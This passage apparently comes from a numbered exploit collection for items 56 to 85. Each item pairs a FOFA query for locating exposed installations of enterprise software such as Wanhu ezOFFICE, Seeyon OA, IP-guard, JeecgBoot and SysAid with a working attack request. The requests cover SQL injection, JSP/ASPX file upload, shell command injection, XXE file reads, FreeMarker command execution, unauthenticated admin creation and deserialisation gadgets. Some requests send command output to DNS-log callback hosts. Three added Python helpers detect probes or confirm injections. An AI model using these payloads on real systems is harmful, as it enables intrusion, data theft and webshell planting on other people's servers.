      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo": {
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

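Added example, not the source article's or any vendor's code: one detector for the type-discriminator probes in items 23, 25, 54 and 56. fastjson keys on "@type", AjaxPro and Json.NET on "__type"/"$type", and item 25 passes a JNDI URL as a plain form field. The fastjson probe in item 23 is not valid JSON, so the scan cannot rely on json.loads() alone. The gadget denylist, the example.invalid callback hosts and the sample bodies are this example's assumptions.

```python
"""Detect type-discriminator deserialisation probes in request bodies.

Added example, not part of the original write-up or any vendor code. Covers
the fastjson "@type" DNS probe (item 23), a JNDI lookup string sent as a form
field (item 25) and the AjaxPro "__type" ObjectDataProvider -> Process.Start
gadget (items 54, 56).
"""
import json
import re
from typing import List

TYPE_KEYS = ("@type", "__type", "$type")          # fastjson / AjaxPro / Json.NET
TYPE_KEY_RE = re.compile(r'"(?:@type|__type|\$type)"\s*:\s*"([^"]+)"')

# Prefixes of the classes used on this page plus two well-known fastjson
# gadgets (assumption: extend for your own estate).
GADGET_PREFIXES = (
    "java.net.URL",                            # DNS callback probe
    "com.sun.rowset.JdbcRowSetImpl",           # fastjson JNDI chain
    "javax.naming",
    "System.Windows.Data.ObjectDataProvider",  # .NET method-invoke gadget
    "System.Diagnostics.Process",              # also matches ProcessStartInfo
)
JNDI_RE = re.compile(r"\b(?:ldaps?|rmi|iiop)://[^\s&\"']+", re.I)


def type_names(body: str) -> List[str]:
    """Return every type discriminator value in *body*, in order of appearance.

    The fastjson probe is deliberately malformed JSON (an unkeyed object
    followed by an empty string): fastjson resolves "@type" before the syntax
    error surfaces. A detector that only walks parsed JSON misses it, so the
    token scan is the authoritative path; json.loads() only walks well-formed
    bodies so nested structures are covered without a regex per nesting level.
    """
    found: List[str] = []

    def walk(node) -> None:
        if isinstance(node, dict):
            for k, v in node.items():
                if k in TYPE_KEYS and isinstance(v, str):
                    found.append(v)
                walk(v)
        elif isinstance(node, list):
            for v in node:
                walk(v)

    try:
        walk(json.loads(body))
    except ValueError:
        pass                                  # malformed on purpose, see above
    for m in TYPE_KEY_RE.finditer(body):
        if m.group(1) not in found:
            found.append(m.group(1))
    return found


def classify(body: str) -> List[str]:
    """Return findings for one request body; an empty list means clean."""
    findings: List[str] = []
    for name in type_names(body):
        cls = name.split(",")[0].strip()      # drop ", Assembly, Version=..."
        if cls.startswith(GADGET_PREFIXES):
            findings.append(f"gadget type discriminator: {cls}")
        else:
            findings.append(f"type discriminator present: {cls}")
    for m in JNDI_RE.finditer(body):
        findings.append(f"JNDI lookup URL in parameter: {m.group(0)}")
    return findings


# Constructed from items 23, 25 and 56 (callback hosts replaced).
FASTJSON_PROBE = ('{"a":{"@type":"com.alibaba.fastjson.JSONObject",'
                  '{"@type":"java.net.URL","val":"http://dns.example.invalid"}}""}')
JNDI_FORM = "type=1&dsname=ldap://dns.example.invalid"
DOTNET_GADGET = (
    '{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, '
    'Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",'
    '"MethodName":"Start","ObjectInstance":{"__type":"System.Diagnostics.Process, System, '
    'Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo":{'
    '"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, '
    'PublicKeyToken=b77a5c561934e089","FileName":"cmd","Arguments":"/c ping dns.example.invalid"}}}}'
)

if __name__ == "__main__":
    for label, body in (("fastjson", FASTJSON_PROBE), ("jndi", JNDI_FORM), ("dotnet", DOTNET_GADGET)):
        print(label, classify(body))
```

A hit on "type discriminator present" without a denylisted class is still worth logging: an endpoint that accepts any discriminator is one gadget discovery away from the denylisted case.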
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA: app="畅捷通-TPlus"

GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA: app="畅捷通-TPlus"

GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"

POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to select 1,user(),3, which the export handler runs as-is and returns as a spreadsheet. Log filters that only look for SQL keywords in the raw query string will not see it.

61. Entsoft (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

The filename query parameter is used unchanged as the stored file name, so a .jsp extension is accepted and the request body becomes the file content.

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The page parameter is passed to a shell; the || operator appends a second command. Then fetch the file it wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

The path value is resolved relative to the download directory, so the ..%2F prefix steps out of it; the response is the file content.

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

The sId element is concatenated into a query; a response delayed by about five seconds confirms the injection.

65. Youkate (优卡特) Lianaiyun (脸爱云) one-face-pass smart management platform 1.0.55.0.0.1 privilege bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
The operator-management handler accepts the addOperators action without a session. A 200 response means the account test123456 / 123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The injection is confirmed when lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the MD5 of the constant 102103122 returned by the injected HashBytes call.

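Items 58 and 66 prove the injection the same way: SQL Server hashes a constant and the hex digest appears in the page, so confirmation needs neither an error message nor timing. The helper below is an added example written for readers of this list, not code from the original post or from any vendor. It derives the marker for whatever probe constant you choose, builds an item-66 style UNION probe for a given column count (6 is taken from item 66 and must be adjusted for other endpoints), and checks a saved response for the marker. The sample responses are constructed; the function names are mine.

```python
import hashlib
import re


def expected_marker(probe):
    """MD5 hex digest that HashBytes('MD5', '<probe>') makes SQL Server return;
    fn_varbintohexstr / fn_sqlvarbasetostr render it as 0x followed by the hex."""
    return hashlib.md5(probe.encode("ascii")).hexdigest()


def hashbytes_probe(probe, columns=6):
    """UNION probe in the shape of item 66: the hashed constant in the first column,
    NULL in the others. `columns` must equal the column count of the original query
    (6 for SendFileCheckTemplateEdit.jsp; item 58 uses an IN (...) form instead)."""
    if not re.fullmatch(r"[0-9A-Za-z]+", probe):
        raise ValueError("keep the probe alphanumeric so it needs no escaping")
    return "' UNION ALL SELECT sys.fn_sqlvarbasetostr(HashBytes('MD5','%s'))%s--" % (
        probe, ",NULL" * (columns - 1))


def response_confirms(body, probe):
    """True when the response carries the probe's MD5, with or without 0x, any case."""
    return re.search(r"(?:0x)?" + expected_marker(probe), body, re.IGNORECASE) is not None


def marker_lines(body, probe):
    """1-based response line numbers holding the marker (item 66 expects lines 42-43)."""
    marker = expected_marker(probe)
    return [n for n, line in enumerate(body.splitlines(), 1) if marker in line.lower()]


# Constructed sample responses (not captured from a real system).
SAMPLE_HIT = "<html>\n<td>0xE10ADC3949BA59ABBE56E057F20F883E</td>\n</html>"
SAMPLE_MISS = "<html>\n<td>1</td>\n</html>"

if __name__ == "__main__":
    print(expected_marker("123456"), expected_marker("102103122"))
    print(hashbytes_probe("102103122"))
    print(response_confirms(SAMPLE_HIT, "123456"), marker_lines(SAMPLE_HIT, "123456"))
```

Pick a fresh probe constant per engagement: the well-known 123456 and 102103122 markers are what generic scanners send, and matching on a value of your own choosing keeps a cached or replayed response from being mistaken for a live result.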
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and the part's filename set the name of the written file, dir its directory (relative to the servlet's document folder, so ../ reaches the web root), and fileType its extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is served at /defaultroot/platform/portal/layout/apoxkq.jsp.

68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The ;.js appended to the path is a servlet path parameter: the authentication filter sees a static .js resource and lets the request through, while the container still dispatches wf_printnum.jsp. A five-second delay confirms the injection.

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Same ;.js authentication bypass as item 68; gd_startUserCode decodes to 1';waitfor delay '0:0:5'--.

70. Wanhu ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 1670

__VIEWSTATE=PAYLOAD

The PAYLOAD is a crafted __VIEWSTATE (ViewState deserialization); the gadget reads the command from the SID header, whose base64 value decodes to type C:\Windows\win.ini.

71. Bangyong (邦永) PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

accId decodes to 1';WAITFOR DELAY '0:0:5'--; the login page is reachable without a session, and a five-second delay confirms the injection.

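Items 64, 68, 69 and 71 all stack WAITFOR DELAY '0:0:5' and leave the reader to judge whether the response was slow. The added example below (mine, not part of the original article) makes that judgement repeatable: it alternates the injected value with a harmless control value several times and compares medians, so a host that is merely slow for everyone is not reported as injectable. `send` is a placeholder for your own HTTP call (for item 71, a GET with accId set to the value and a timeout above the delay); `make_fake_sender` stands in for a target and is constructed for this example, as is every name in the block.

```python
import statistics
import time


def waitfor_payload(prefix, seconds):
    """Injected value in the shape used above: close the original value (prefix),
    stack a WAITFOR DELAY, comment out the rest. prefix is "1'" for string
    contexts (items 69/71) or "1" for numeric ones (item 68)."""
    return "%s;WAITFOR DELAY '0:0:%d'--" % (prefix, seconds)


def confirm_time_based(send, injected, control, delay_s=5.0, trials=3, ratio=0.8):
    """Alternate control and injected requests `trials` times and compare the medians
    of their round-trip times. The injection is confirmed only when the injected
    median exceeds the control median by at least ratio * delay_s, so a uniformly
    slow host is not mistaken for a sleeping database.
    `send(value)` is your own HTTP call; it must use a timeout above delay_s."""
    control_times, injected_times = [], []
    for _ in range(trials):
        for value, bucket in ((control, control_times), (injected, injected_times)):
            start = time.perf_counter()
            send(value)
            bucket.append(time.perf_counter() - start)
    control_med = statistics.median(control_times)
    injected_med = statistics.median(injected_times)
    gap = injected_med - control_med
    return {
        "confirmed": gap >= ratio * delay_s,
        "gap_s": round(gap, 3),
        "control_median_s": round(control_med, 3),
        "injected_median_s": round(injected_med, 3),
    }


def make_fake_sender(sleep_s):
    """Stand-in for the network (constructed for this example, not a real target):
    behaves like an MSSQL-backed page that honours a WAITFOR in the parameter."""
    def send(value):
        if "WAITFOR DELAY" in value.upper():
            time.sleep(sleep_s)
    return send


if __name__ == "__main__":
    # Real use: replace make_fake_sender(...) with a function that issues the request.
    vulnerable = make_fake_sender(sleep_s=0.5)
    print(confirm_time_based(vulnerable, waitfor_payload("1'", 5), "1", delay_s=0.5, trials=2))
```

Run it against a staging copy rather than production where possible: each confirmed trial holds a database connection for the full delay, and three trials against an endpoint that is already under load can be felt by users.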
72. Seeyon (致远) OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

xmlValue, URL-decoded, is the document the servlet parses with external entities enabled:

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "file:///c:/windows/win.ini" >
]>
<Signature><Field><a Index="ProtectItem">true</a><b Index="Caption">caption</b><c Index="ID">id</c><d Index="VALUE">&xxe;</d></Field></Signature>

The content of win.ini is returned in place of the VALUE field.

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. Seeyon (致远) M3-Server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The time value is substituted into a shell command, so the backticks run ifconfig and write its output next to the CGI. Then fetch the file:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. Newcapec (新开普) campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

UnitCode is rendered through FreeMarker. The ?new() built-in instantiates freemarker.template.utility.Execute, which runs the string it is given as an OS command, so the marker file lands in the ROOT web application. Then fetch it:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

The folder field chooses the destination directory under the web root and the .aspx extension of the Filedata part is not filtered.

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

The target field sets the destination directory and the file is stored under its original name. Then fetch it:

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) flow-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

The path value is passed to a shell; the pipe runs id and the output is returned in the response.

80. Suda (速达) Tianyao software DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

The report parameter names the file to save, including its path; ../ moves it from the report directory to the web root, and the request body is written as the content. Then fetch it:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

Command 255 is answered without a valid login handle (u32UserLoginHandle is -1) and the response includes account credentials.

82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

The z2 value is interpolated into a shell command line; the closing quote, pipe and semicolon break out of the intended argument and run id.

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

The command to run is carried in the Cmd header; the JSON body (PAYLOAD) is the data-source definition whose connection test triggers it.

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami`\")}",
  "type": "0"
}

The sql field is rendered as a FreeMarker template before it is run; as in item 76, ?new() instantiates Execute and the output of whoami reaches the DNS log through the curl request.

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is shown below; the payload deploys a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
